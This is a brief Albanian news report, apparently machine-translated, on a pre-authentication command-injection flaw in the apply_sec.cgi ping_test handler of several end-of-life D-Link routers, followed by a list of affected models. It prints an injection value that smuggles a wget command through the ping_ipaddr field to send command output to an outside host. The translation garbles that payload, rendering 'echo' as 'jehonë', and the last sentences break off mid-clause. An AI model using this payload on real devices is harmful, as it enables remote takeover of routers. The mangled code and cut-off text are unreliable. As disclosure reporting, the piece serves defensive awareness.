Në ruterat me valë D-Link
Interesante, sipas zhvilluesve të firmuerit, thirrja "ping_test" duhet të ekzekutohet vetëm pas vërtetimit, por në realitet thirret në çdo rast, pavarësisht nga hyrja në ndërfaqen e uebit. Në veçanti, kur hyn në skriptin apply_sec.cgi dhe kalon parametrin "action=ping_test", skripti ridrejtohet në faqen e vërtetimit, por në të njëjtën kohë kryen veprimin e lidhur me ping_test. Për të ekzekutuar kodin, një dobësi tjetër u përdor në vetë ping_test, e cila thërret programin ping pa kontrolluar siç duhet korrektësinë e adresës IP të dërguar për testim. Për shembull, për të thirrur programin wget dhe për të transferuar rezultatet e komandës "echo 1234" në një host të jashtëm, thjesht specifikoni parametrin "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( jehonë 1234)".
Prania e cenueshmërisë është konfirmuar zyrtarisht në modelet e mëposhtme:
- DIR-655 me firmware 3.02b05 ose më të vjetër;
- DIR-866L me firmware 1.03b04 ose më të vjetër;
- DIR-1565 me firmware 1.01 ose më të vjetër;
- DIR-652 (nuk ofrohet asnjë informacion në lidhje me versionet problematike të firmuerit)
Periudha e mbështetjes për këto modele tashmë ka skaduar, kështu që D-Link
Më vonë u zbulua se dobësia ishte gjithashtu
Burimi: opennet.ru